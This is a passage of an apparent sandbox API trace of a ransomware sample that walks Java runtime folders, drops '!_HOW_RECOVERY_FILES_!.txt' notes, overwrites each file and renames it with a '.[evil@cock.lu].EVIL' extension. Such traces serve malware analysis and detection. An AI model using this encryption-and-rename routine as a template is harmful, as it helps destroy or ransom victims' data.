Files\\Java\\jre1.8.0_131\\lib\\applet\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet\\*" [0094.176] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd140 [0094.179] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.179] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet\\.") returned 48 [0094.179] wcscmp (_String1=".", _String2=".") returned 0 [0094.179] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.179] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.179] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet\\..") returned 49 [0094.179] wcscmp (_String1=".", _String2="..") returned -1 [0094.179] wcscmp (_String1="..", _String2="..") returned 0 [0094.179] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0094.179] FindClose (in: hFindFile=0x84b11dd140 | out: hFindFile=0x84b11dd140) returned 1 [0094.179] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet") returned 0x2e [0094.179] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.179] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.179] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\applet\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.180] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0094.180] __uncaught_exception () returned 0x84b1160800 [0094.180] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.180] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.180] wcsstr (_Str="calendars.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.180] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties") returned 60 [0094.180] wcscmp (_String1="calendars.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.180] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="calendars.properties") returned 0x0 [0094.181] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties") returned 0x3c [0094.181] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.183] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x562, lpOverlapped=0x0) returned 1 [0094.186] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.186] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.186] _errno () returned 0x84b1160840 [0094.186] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.186] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x580, lpOverlapped=0x0) returned 1 [0094.186] CloseHandle (hObject=0x1a4) returned 1 [0094.186] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.187] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.187] __uncaught_exception () returned 0x84b1160800 [0094.187] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.187] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\calendars.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\calendars.properties.[evil@cock.lu].evil")) returned 1 [0094.191] ??_V@YAXPEAX@Z () returned 0x1 [0094.195] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties", dwFileAttributes=0x0) returned 0 [0094.195] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.195] wcsstr (_Str="charsets.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.195] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar") returned 52 [0094.195] wcscmp (_String1="charsets.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.195] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="charsets.jar") returned 0x0 [0094.195] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar") returned 0x34 [0094.195] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.198] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0094.244] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.245] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.245] _errno () returned 0x84b1160840 [0094.246] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.246] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0094.264] CloseHandle (hObject=0x1a4) returned 1 [0094.264] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.264] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.264] __uncaught_exception () returned 0x84b1160800 [0094.264] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.266] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\charsets.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\charsets.jar.[evil@cock.lu].evil")) returned 1 [0094.267] ??_V@YAXPEAX@Z () returned 0x1 [0094.271] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar", dwFileAttributes=0x0) returned 0 [0094.271] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.271] wcsstr (_Str="classlist", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.271] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist") returned 49 [0094.271] wcscmp (_String1="classlist", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.271] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="classlist") returned 0x0 [0094.271] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist") returned 0x31 [0094.271] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.273] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x14983, lpOverlapped=0x0) returned 1 [0094.277] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.277] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.277] _errno () returned 0x84b1160840 [0094.277] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.277] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x149a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x149a0, lpOverlapped=0x0) returned 1 [0094.277] CloseHandle (hObject=0x1a4) returned 1 [0094.278] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.278] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.278] __uncaught_exception () returned 0x84b1160800 [0094.278] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.278] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\classlist"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\classlist.[evil@cock.lu].evil")) returned 1 [0094.279] ??_V@YAXPEAX@Z () returned 0x1 [0094.282] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist", dwFileAttributes=0x0) returned 0 [0094.283] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.283] wcsstr (_Str="cmm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.283] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm") returned 43 [0094.283] wcscmp (_String1=".", _String2="cmm") returned -1 [0094.283] wcscmp (_String1="..", _String2="cmm") returned -1 [0094.283] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm") returned 0x2b [0094.283] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm") returned 0x0 [0094.283] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\*" [0094.283] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dcfc0 [0094.283] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.283] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\.") returned 45 [0094.283] wcscmp (_String1=".", _String2=".") returned 0 [0094.283] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.283] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.283] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\..") returned 46 [0094.283] wcscmp (_String1=".", _String2="..") returned -1 [0094.283] wcscmp (_String1="..", _String2="..") returned 0 [0094.283] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.283] wcsstr (_Str="CIEXYZ.pf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.283] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf") returned 53 [0094.283] wcscmp (_String1="CIEXYZ.pf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.283] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CIEXYZ.pf") returned 0x0 [0094.283] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf") returned 0x35 [0094.283] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.286] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc824, lpOverlapped=0x0) returned 1 [0094.290] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.290] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.290] _errno () returned 0x84b1160840 [0094.290] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.290] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xc840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc840, lpOverlapped=0x0) returned 1 [0094.290] CloseHandle (hObject=0x1a8) returned 1 [0094.290] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.290] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.291] __uncaught_exception () returned 0x84b1160800 [0094.291] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\ciexyz.pf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\ciexyz.pf.[evil@cock.lu].evil")) returned 1 [0094.292] ??_V@YAXPEAX@Z () returned 0x1 [0094.296] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf", dwFileAttributes=0x0) returned 0 [0094.296] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.296] wcsstr (_Str="GRAY.pf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.296] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf") returned 51 [0094.296] wcscmp (_String1="GRAY.pf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.296] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="GRAY.pf") returned 0x0 [0094.297] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf") returned 0x33 [0094.297] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.299] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x278, lpOverlapped=0x0) returned 1 [0094.302] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.302] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.302] _errno () returned 0x84b1160840 [0094.302] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.302] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x280, lpOverlapped=0x0) returned 1 [0094.302] CloseHandle (hObject=0x1a8) returned 1 [0094.302] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.303] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.303] __uncaught_exception () returned 0x84b1160800 [0094.303] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.305] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\gray.pf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\gray.pf.[evil@cock.lu].evil")) returned 1 [0094.306] ??_V@YAXPEAX@Z () returned 0x1 [0094.310] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf", dwFileAttributes=0x0) returned 0 [0094.310] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.310] wcsstr (_Str="LINEAR_RGB.pf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.310] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf") returned 57 [0094.310] wcscmp (_String1="LINEAR_RGB.pf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.310] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LINEAR_RGB.pf") returned 0x0 [0094.310] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf") returned 0x39 [0094.310] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.312] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x414, lpOverlapped=0x0) returned 1 [0094.316] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.316] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.316] _errno () returned 0x84b1160840 [0094.316] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.316] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x420, lpOverlapped=0x0) returned 1 [0094.316] CloseHandle (hObject=0x1a8) returned 1 [0094.316] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.317] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.317] __uncaught_exception () returned 0x84b1160800 [0094.317] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.317] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\linear_rgb.pf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\linear_rgb.pf.[evil@cock.lu].evil")) returned 1 [0094.318] ??_V@YAXPEAX@Z () returned 0x1 [0094.321] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf", dwFileAttributes=0x0) returned 0 [0094.321] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.321] wcsstr (_Str="PYCC.pf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.321] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf") returned 51 [0094.321] wcscmp (_String1="PYCC.pf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.321] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PYCC.pf") returned 0x0 [0094.321] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf") returned 0x33 [0094.322] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.324] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4302a, lpOverlapped=0x0) returned 1 [0094.341] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.341] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.341] _errno () returned 0x84b1160840 [0094.341] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.341] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x43040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x43040, lpOverlapped=0x0) returned 1 [0094.342] CloseHandle (hObject=0x1a8) returned 1 [0094.342] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.342] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.343] __uncaught_exception () returned 0x84b1160800 [0094.343] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.343] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\pycc.pf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\pycc.pf.[evil@cock.lu].evil")) returned 1 [0094.343] ??_V@YAXPEAX@Z () returned 0x1 [0094.347] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf", dwFileAttributes=0x0) returned 0 [0094.348] FindNextFileW (in: hFindFile=0x84b11dcfc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.348] wcsstr (_Str="sRGB.pf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.348] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf") returned 51 